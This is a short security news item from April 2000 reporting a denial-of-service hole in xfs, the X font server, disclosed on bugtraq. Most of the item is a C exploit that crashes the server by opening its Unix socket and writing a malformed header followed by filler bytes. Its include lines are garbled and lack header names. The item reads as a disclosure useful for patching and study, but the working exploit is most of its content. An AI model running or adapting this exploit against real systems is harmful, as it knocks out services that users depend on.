Originally Published: Monday, 17 April 2000 Author: Alexander Reelsen
Published to: news_enhance_security/Security News Page: 1/1 - [Printable]

xfs Denial of Service attack

Yet another hole revealed by Michal Zalewski on bugtraq is an easy to use Denial of Service attack on xfs, the x font server. This exploit has been tested under RedHat 6.x.

   Page 1 of 1  

#include #include

#define CNT 50 #define FS "/tmp/.font-unix/fs-1"

int s,y; struct sockaddr_un x;

char buf[CNT];

main() { for (y;y<2;y++) { s=socket(PF_UNIX,SOCK_STREAM,0); x.sun_family=AF_UNIX; strcpy(x.sun_path,FS); if (connect(s,&x,sizeof(x))) { perror(FS); exit(1); } if (!y) write(s,"lK",2); memset(buf,'A',CNT); write(s,buf,CNT); shutdown(s,2); close(s); } }

   Page 1 of 1